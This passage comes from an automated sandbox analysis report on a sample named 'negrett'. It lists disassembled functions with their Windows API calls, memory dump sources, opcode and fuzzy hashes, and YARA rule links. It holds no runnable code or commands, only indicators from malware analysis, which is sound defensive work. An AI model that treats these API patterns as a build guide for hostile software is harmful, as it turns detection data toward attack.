Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 8e096dc66290e0510deea87fbee1cbf5793d281e6cf6e3bebadf2fa1eb2d4e1e
Instruction ID: afc6a178c2f0f7fd1227d3dd0a39b48895e6de5217ac1cb2179cd98fc4e7faf4
Opcode Fuzzy Hash: 8e096dc66290e0510deea87fbee1cbf5793d281e6cf6e3bebadf2fa1eb2d4e1e
Instruction Fuzzy Hash: A7311430A042187FEF66CB748C05BFE7BE5EBC9320F04C29AE4A9931D1C37499858792

Uniqueness

Uniqueness Score: -1.00%

Function 029EF4C6 Relevance: 6.1, APIs: 4, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 029EF4C6

Part of subcall function 029EF4ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 029EF595
Part of subcall function 029EF4ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 029EF5A0

___scrt_fastfail.LIBCMT ref: 029EF4E7

Part of subcall function 029EF4A3: __onexit.LIBCMT ref: 029EF4A9

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID: __crt_fast_encode_pointer$___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID:
API String ID: 3435762107-0
Opcode ID: 7b55b6850c899a45e1c1216e6022cda955ea3dce2ceb4d0304ac77cf41e12fec
Instruction ID: af8ac2e24082af12998b8b2fd1119b5e76fef29cdac8d1b9229b02a116e50143
Opcode Fuzzy Hash: 7b55b6850c899a45e1c1216e6022cda955ea3dce2ceb4d0304ac77cf41e12fec
Instruction Fuzzy Hash: 7D21F6327457106BDF226FB4AC49B7937A8EB54B61F200237F807D7A90DF6498008E9C

Uniqueness

Uniqueness Score: -1.00%

Function 00BA2782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00BA280A
SetWindowLongW.USER32 ref: 00BA2824
SetWindowLongW.USER32 ref: 00BA2832
SetLayeredWindowAttributes.USER32 ref: 00BA2840

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 81751e25e1dfd0766599a488746fb3f2dbd5638f8d22048539979cada08a9370
Instruction ID: 1830b7964b8e851fe7cee0b8d1d6c9448dca4776c7ea7b3ceaa9ba1b7c5bebbf
Opcode Fuzzy Hash: 81751e25e1dfd0766599a488746fb3f2dbd5638f8d22048539979cada08a9370
Instruction Fuzzy Hash: 5721D331608511AFD714DB28C845FAA7BD5EF46324F148198F4268B6E2CB75FD82CB90

Uniqueness

Uniqueness Score: -1.00%

Function 029F2782 Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

___vcrt_FlsGetValue.LIBVCRUNTIME ref: 029F279E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 029F27B7

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID: Value___vcrt_
String ID:
API String ID: 1426506684-0
Opcode ID: 946f278fc3e31e727c81028ebb0495bff9378def4856718e2f28f762550e10d8
Instruction ID: ced12e47c3e75b6ff257e23d29169d4c6a1c68713413ef53e05e707fe5ee2233
Opcode Fuzzy Hash: 946f278fc3e31e727c81028ebb0495bff9378def4856718e2f28f762550e10d8
Instruction Fuzzy Hash: 80014233E493119EAAF127B5BCC4B672B99EB45778720023AFF24481F0EF1198028798

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00B7E1FD
MessageBoxW.USER32 ref: 00B7E230
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00B7E246
CloseHandle.KERNEL32(00000000), ref: 00B7E24D

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: ad0550d49e6aa99fdaf688575352cd0cab6aa71aebafc21c73ffad3051d29086
Instruction ID: 00322601381a222e697275ce7e24c2fb63bad0ba2f191bd83226b7b1372e0831
Opcode Fuzzy Hash: ad0550d49e6aa99fdaf688575352cd0cab6aa71aebafc21c73ffad3051d29086
Instruction Fuzzy Hash: F811C876A04254BBC7019FAC9C45A9F7FEDDF45310F148695F939E7291DA70CD0487A0

Uniqueness

Uniqueness Score: -1.00%

Function 029F2F3C Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 029F2F56

Part of subcall function 029F2EA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 029F2ED2
Part of subcall function 029F2EA3: ___AdjustPointer.LIBCMT ref: 029F2EED

_UnwindNestedFrames.LIBCMT ref: 029F2F6B
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 029F2F7C
CallCatchBlock.LIBVCRUNTIME ref: 029F2FA4

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction ID: 64ed645ad70230afd54025f6361c49422815352485f5ddcb9914bfedc77b26ee
Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction Fuzzy Hash: 79011732500148BBDF92AF95CC45EEB7F6AEF98754F054014FF08A6120C336E861AFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B1600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32 ref: 00B1604C
GetStockObject.GDI32(00000011), ref: 00B16060
SendMessageW.USER32(00000000,00000030,00000000), ref: 00B1606A

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 28b3b306bae44cdda6d1a628b2faf42f25e4684c7a3ac29ebe273579e877d415
Instruction ID: 46d261516242b44cc024135ddf8a21be4fb1cf6ea6adf56bb912de30bc68f3a0
Opcode Fuzzy Hash: 28b3b306bae44cdda6d1a628b2faf42f25e4684c7a3ac29ebe273579e877d415
Instruction Fuzzy Hash: BD116D72501548BFEF168FA49C89EEABFADEF0D3A4F440255FA1552110DB329CA0DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B72DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00B72DC5
GetWindowThreadProcessId.USER32(?,00000000), ref: 00B72DD6
GetCurrentThreadId.KERNEL32(00000000,?,00000000,00000000), ref: 00B72DDD
AttachThreadInput.USER32(00000000,?,00000000), ref: 00B72DE4

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 7b3d13f033925819e00513fc7897a10c1684abe3cbea9974daebee04515bcf55
Instruction ID: 180856e6beedc7f777081a3470dc003491b0e7451c543163cbf2cf5893232f2e
Opcode Fuzzy Hash: 7b3d13f033925819e00513fc7897a10c1684abe3cbea9974daebee04515bcf55
Instruction Fuzzy Hash: A0E092716012247BD7305B769C0EFEB3EACEF43BA1F104065F509D30809EA0C840D6B0

Uniqueness

Uniqueness Score: -1.00%

Function 00BA8863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00B29639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 00B29693
Part of subcall function 00B29639: SelectObject.GDI32(?,00000000), ref: 00B296A2
Part of subcall function 00B29639: BeginPath.GDI32(?), ref: 00B296B9
Part of subcall function 00B29639: SelectObject.GDI32(?,00000000), ref: 00B296E2

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00BA8887
LineTo.GDI32(?,?,?), ref: 00BA8894
EndPath.GDI32(?), ref: 00BA88A4
StrokePath.GDI32(?), ref: 00BA88B2

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 586ada54fc70ba74319543e4c670c18955cdaf761a282e92be6d1f3ec78aa08d
Instruction ID: 3d5da0404f0c85c30ee6955297f731b3cdb9d3582c35eccb9a62a81dfdd1ffed
Opcode Fuzzy Hash: 586ada54fc70ba74319543e4c670c18955cdaf761a282e92be6d1f3ec78aa08d
Instruction Fuzzy Hash: 26F03A36045258BADB225F94AC0EFCE3E99AF06310F548040FA11660E2CF795511CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 02A4850C Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 029D6A20: _wcslen.LIBCMT ref: 029D6A25

Part of subcall function 029D5F57: _wcslen.LIBCMT ref: 029D5F6A

_wcslen.LIBCMT ref: 02A48906
_wcslen.LIBCMT ref: 02A4892D

Strings

X, xrefs: 02A48812

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID: _wcslen
String ID: X
API String ID: 176396367-3081909835
Opcode ID: 2cd2e29e906c3bffebd332faea78e62c59c39445b1535c3da010f19e2b38c6d9
Instruction ID: 5aa3a6ab14389617cf1d92bb1a2e982bfc9661f1ba089d92d6a53339ec4a3c32
Opcode Fuzzy Hash: 2cd2e29e906c3bffebd332faea78e62c59c39445b1535c3da010f19e2b38c6d9
Instruction Fuzzy Hash: 64E16831A04340CFD724EF24D880A6AB7E6BFC4354F14896DE8899B2A1DF35E905CF92

Uniqueness

Uniqueness Score: -1.00%

Function 029D6B78 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 273COMMON

Download Yara Rule

Strings

', xrefs: 02A14569
", xrefs: 02A14553

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID:
String ID: "$'
API String ID: 0-2422873937
Opcode ID: d93b0d9a50323905c636a341ba488681d99ee594726b78776deaff5ddd4a418f
Instruction ID: 371d6e0b021dbf4819816871698482cae3d6b25d345c0c444a4cfc5c81241149
Opcode Fuzzy Hash: d93b0d9a50323905c636a341ba488681d99ee594726b78776deaff5ddd4a418f
Instruction Fuzzy Hash: 62811771640205BBCF61AF64EC41FEE3BAEBF48354F048029F906AB181EB74DA45DB95

Uniqueness

Uniqueness Score: -1.00%

Function 02A30601 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241COMMON

Download Yara Rule

Strings

ZL, xrefs: 02A30792
, xrefs: 02A3065A

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID:
String ID: $ZL
API String ID: 0-3552672294
Opcode ID: 5f4b0bf46cdb33aff3f6cf388ae02dd567b21fd811a3edf0408685ce73b227fd
Instruction ID: 2acf8e04cd07f2dc7f640216b09b89c1114f87f9ccff9e2963db8eac741ef1ef
Opcode Fuzzy Hash: 5f4b0bf46cdb33aff3f6cf388ae02dd567b21fd811a3edf0408685ce73b227fd
Instruction Fuzzy Hash: 2D81BC71900209AFDF229FA4CD89FEE7BB9EF04708F14403AF914A21A0DB718944CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00B84D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00B17620: _wcslen.LIBCMT ref: 00B17625

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00B84ED4

Strings

LPT, xrefs: 00B84DFB
*, xrefs: 00B84E10

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: fefe33c7d892e1c7c7f519e838a2b5c7ef827e05a367e300811cd4ad3b7233a9
Instruction ID: 86f6e3ec9febffba1889d559ad4656612d15e3470c9e2953f2b9e78c753a3b1a
Opcode Fuzzy Hash: fefe33c7d892e1c7c7f519e838a2b5c7ef827e05a367e300811cd4ad3b7233a9
Instruction Fuzzy Hash: 4C913B75A002059FCB14EF58C494EAABBF1EF48304F5980D9E90A9F362DB35ED85CB91

Uniqueness

Uniqueness Score: -1.00%

Function 029D284D Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 02A12677
_wcslen.LIBCMT ref: 02A12686

Strings

\, xrefs: 02A1268C

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID: _wcslen
String ID: \
API String ID: 176396367-2967466578
Opcode ID: 787807e1afe6a33cfab8ca21ee33a923b567645059f81b4a1e8a0612646f87ea
Instruction ID: b6846c2eafb2dc014487f2bfc99337ac9309cad8eb02bea587fe39432a3c43c6
Opcode Fuzzy Hash: 787807e1afe6a33cfab8ca21ee33a923b567645059f81b4a1e8a0612646f87ea
Instruction Fuzzy Hash: AB718B714053009EC714EF69ED8096ABBE8FFA5350F80483FF945871A0EBB49948DF69

Uniqueness

Uniqueness Score: -1.00%

Function 00B3E27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00B3E30D

Strings

pow, xrefs: 00B3E2E5, 00B3E302

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 89c45043023f0327c5990733e113d3c4db9d33c60e56d92b1d6e1ff3db5454af
Instruction ID: 746bce579c3771c143850891b8549b9f0b5ae546ac0d96cf8017ce2f9b0ef592
Opcode Fuzzy Hash: 89c45043023f0327c5990733e113d3c4db9d33c60e56d92b1d6e1ff3db5454af
Instruction Fuzzy Hash: 1C513BA1E9C10296CB167728CD417BA3BE8DB40740F344EEAE0E5472E9DF34CD95EA46

Uniqueness

Uniqueness Score: -1.00%

Function 00B2E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 00B2E1B1

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 9856b348d1a97dded2c152494dd15881aa89519e9c1582af26930b4f778da385
Instruction ID: 6bab4f0c299f55a88c2d2df99696da2846e8ebcf45f96afc8a13d480f85ec68d
Opcode Fuzzy Hash: 9856b348d1a97dded2c152494dd15881aa89519e9c1582af26930b4f778da385
Instruction Fuzzy Hash: E5510439500256DFDB15DF68D481AFA7BE8EF15310F6440D5E8A69B2D0DB38DD42CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02A4311E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 101COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 02A4316D

Strings

\, xrefs: 02A43177
:, xrefs: 02A43182

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID: _wcslen
String ID: :$\
API String ID: 176396367-1166558509
Opcode ID: 8393664a22464e4253d7eab9e567e7331e947b0021ede9ca1273046c13f8be72
Instruction ID: 761b8c5f0a567b62fce2aec0b722b0d8c7a376e8fb2ed56054aca90f2d5a8e01
Opcode Fuzzy Hash: 8393664a22464e4253d7eab9e567e7331e947b0021ede9ca1273046c13f8be72
Instruction Fuzzy Hash: 4E317375900149ABDF219BA4DC88FEB77BDEF89704F2041B6FA09D6050EF74D2448B28

Uniqueness

Uniqueness Score: -1.00%

Function 00BA4537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 00BA461F
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00BA4634

Strings

', xrefs: 00BA458E

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 3fd59be2d93305dfc532061ee93eb0322f9848d6af36596bda271ab722231d01
Instruction ID: f58f179c50b1be5fa65ca20721e9fd5ff038b3b991128518114c18d331c1fcc2
Opcode Fuzzy Hash: 3fd59be2d93305dfc532061ee93eb0322f9848d6af36596bda271ab722231d01
Instruction Fuzzy Hash: 55312774A05209AFDF14CFA9C980BDA7BF5FF9A300F1044AAE904AB341D7B0A941CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00B8CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00B8CD7D
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00B8CDA6

Strings

<local>, xrefs: 00B8CD66

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: d63a2098f2c174496c6d66a031249e62990cd0d0d800044108fb0cb8acd9c984
Instruction ID: da2f624db1c7586724e25a6c1b4c67eedf4ea77a5339044dc9405540e84cfb2b
Opcode Fuzzy Hash: d63a2098f2c174496c6d66a031249e62990cd0d0d800044108fb0cb8acd9c984
Instruction Fuzzy Hash: 9F11C6B1205631BAD7347B668C85EE7BEECEF127A4F1042B6B119831A0D7709841D7F0

Uniqueness

Uniqueness Score: -1.00%

Function 00B76C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00B19CB3: _wcslen.LIBCMT ref: 00B19CBD

CharUpperBuffW.USER32(?,?), ref: 00B76CB6
_wcslen.LIBCMT ref: 00B76CC2

Strings

STOP, xrefs: 00B76CBC, 00B76CC1

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: 07e5a36210816a2744c42d5d6462002aaf007c2dd2721fde5d4e0856e42f2669
Instruction ID: 44b2b40c5b3984a961d3894ce3ed58ee0d92c36feb11a41ad9fae34cd77b4b6c
Opcode Fuzzy Hash: 07e5a36210816a2744c42d5d6462002aaf007c2dd2721fde5d4e0856e42f2669
Instruction Fuzzy Hash: 22012233A1092A8BCB21AFBDCC809FF77F4EB61710B5049B8E87697190EB31D940C650

Uniqueness

